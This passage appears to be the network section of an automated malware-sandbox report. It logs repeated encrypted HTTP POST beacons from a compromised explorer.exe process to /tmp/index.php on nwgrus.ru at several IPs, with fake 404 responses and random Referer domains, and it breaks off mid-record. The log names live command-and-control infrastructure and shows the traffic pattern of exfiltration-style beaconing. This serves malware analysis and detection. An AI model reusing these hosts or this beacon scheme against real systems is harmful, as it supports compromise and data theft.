                                      Oct 13, 2024 18:28:19.740176916 CEST232OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 28 6b 2c 90 f5 76 0b 75 30 38 ee 8a
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[(k,vu08v\F7R4PbFy6dPI^7F.Q=WZb{a}c 8 J2fIDk*
                                      Oct 13, 2024 18:28:20.703269005 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:28:20 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      36192.168.2.465270148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:29:25.655539989 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://fmwnhyofuij.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 221
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:29:25.655575037 CEST221OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 20 1e c1 bb
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu hM!4_$1>_pY .]f($+Df91:"vN9C]5#a\9uY]:LsL
                                      Oct 13, 2024 18:29:26.607275963 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:29:26 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      37192.168.2.465271148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:29:27.831768036 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://rihjcvuphiddchm.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 220
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:29:27.831768990 CEST220OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 1d a0 a7
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuBVhfe qBssSYUW^H6%E#x=X7ptZs#<nX1-NK5oe
                                      Oct 13, 2024 18:29:28.770073891 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:29:28 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      38192.168.2.465272148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:29:29.091999054 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://oqytxooojaw.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 290
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:29:29.092036963 CEST290OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4e 5e b2 83
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuN^[oWoUVbprl.l.+uW]4#b(A*Laz]cp$r.M=arE13*cQneM~^Xi@D{MGS6
                                      Oct 13, 2024 18:29:30.032151937 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:29:29 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      39192.168.2.465273148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:29:30.604149103 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://vgkkdltoovhgj.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 302
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:29:30.604204893 CEST302OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 45 23 db fe
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuE#9YGUbcR%!tqYKb|y1Z]j'af7NP-x9XDD1y883! yw][b8AwN3
                                      Oct 13, 2024 18:29:31.548640966 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:29:31 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      40192.168.2.465274148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:29:31.764997005 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://judwwmqxinxkj.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 314
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:29:31.765028000 CEST314OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 5c b7 8f
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuw\\)zZ{TU/;f\$nKRa6Wst9]2{&?LwU9;*gcr"3s70bB@\)lmbuk4}
                                      Oct 13, 2024 18:29:32.705795050 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:29:32 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      41192.168.2.465275148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:29:37.426177025 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://tcjadfthgiofpvtt.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 361
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:29:37.426275969 CEST361OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 44 bd 85
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu@DfNsS+:iytVle]J$"d8SBJx9t{W5KL/"y!55t7:llYNUVgFa
                                      Oct 13, 2024 18:29:38.369604111 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:29:38 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      42192.168.2.465276148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:29:42.459172010 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://phfffsllnpice.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 136
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:29:42.459172010 CEST136OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 50 4c e4 84
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuPLd/DYFJoU20j,8k;n;Cy
                                      Oct 13, 2024 18:29:43.415448904 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:29:43 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      43192.168.2.465277148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:29:47.524832010 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ripegxsqlidtbjlk.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 267
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:29:47.524864912 CEST267OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 25 fa e7
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vue%xwxX";~g-]6>CwW=r^LMO}-JvR([Wo$&SbTt,P`DERrYc{E
                                      Oct 13, 2024 18:29:48.485850096 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:29:48 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      44192.168.2.465278148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:29:52.684465885 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://siolcmqbegyqsn.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 256
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:29:52.684540987 CEST256OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 03 b6 ed
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu]pCQHKn`LFmLe98StMRG_H<F9IU=7R<d Y=g=k3U:Ak|rEpwoF196
                                      Oct 13, 2024 18:29:53.627422094 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:29:53 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      45192.168.2.465279148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:29:58.718908072 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://xwvgudwewoih.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 265
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:29:58.718909025 CEST265OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 3e ff ac
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuH>JoX ]6\*+J=EV18(BF!3[Vq6d^>I\OSqnV$9M:E]~<Z=~MC-
                                      Oct 13, 2024 18:29:59.680485964 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:29:59 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      46192.168.2.465280148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:30:05.143635035 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://cpcybixettuxhrkt.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 187
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:30:05.143667936 CEST187OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 55 c3 91
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuUUo^XXU-}hc(o[#F@`Oh(Lne2Dc~.3
                                      Oct 13, 2024 18:30:06.085484028 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:30:05 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      47192.168.2.465281148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:30:11.316328049 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://gixrpkowgjh.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 338
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:30:11.316346884 CEST338OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 26 29 aa b5
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu&)`X`Ez:7YA;u]X_/z4Q3WvH' o)A'Z_J+SduP\Qcos7*TaeT#%
                                      Oct 13, 2024 18:30:12.261116028 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:30:12 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      48192.168.2.465282190.156.239.49802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:30:20.015578032 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://voqchluhblp.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 353
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:30:20.015578032 CEST353OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 45 b7 9a
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu#Ebjez%^\W~-sATtt7U77Q/zN).wZ0Jv)ZJg758^E8gXcAsl)]A3
                                      Oct 13, 2024 18:30:21.478468895 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:30:20 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r
                                      Oct 13, 2024 18:30:21.478584051 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:30:20 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      49192.168.2.465283190.156.239.49802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:30:26.129671097 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://wxvosrmogsfitpw.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 286
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:30:26.129710913 CEST286OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 27 b8 f2
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu"'8ZtHd'c<;8PfZf/I^9<pxV"u#s;waCjQWuXeLSFy,h*Y = Od
                                      Oct 13, 2024 18:30:27.201457977 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:30:27 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      50192.168.2.465284190.156.239.49802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:30:32.353360891 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://pxipmfrupftaxri.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 220
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:30:32.353400946 CEST220OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6f 1d f8 bf
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuoUWqm[x*V+*}.xA`h(<@e%S@u>bB.'bU]ipFM0)k
                                      Oct 13, 2024 18:30:33.412847996 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:30:33 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      51192.168.2.465285190.156.239.49802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:30:38.908505917 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://piulubiplhrouqkj.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 341
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:30:38.908505917 CEST341OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 48 ca 8e
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuJHQ^U)h!.d$n(k(D-4K< /N=)kv><vGA0aZ2onglpQ2
                                      Oct 13, 2024 18:30:39.981079102 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:30:39 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      52192.168.2.465286190.156.239.49802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:30:44.559293985 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ynnjyahqefoad.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 216
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:30:44.559294939 CEST216OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2f 54 c0 81
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu/TTh{%.e57k{"|zCY?1SQA5<C>ESs1W8B=+sk/TTTf@
                                      Oct 13, 2024 18:30:45.632917881 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:30:45 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      53192.168.2.465287190.156.239.49802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:30:50.969672918 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://gtsvsrpyerihmcqc.org/
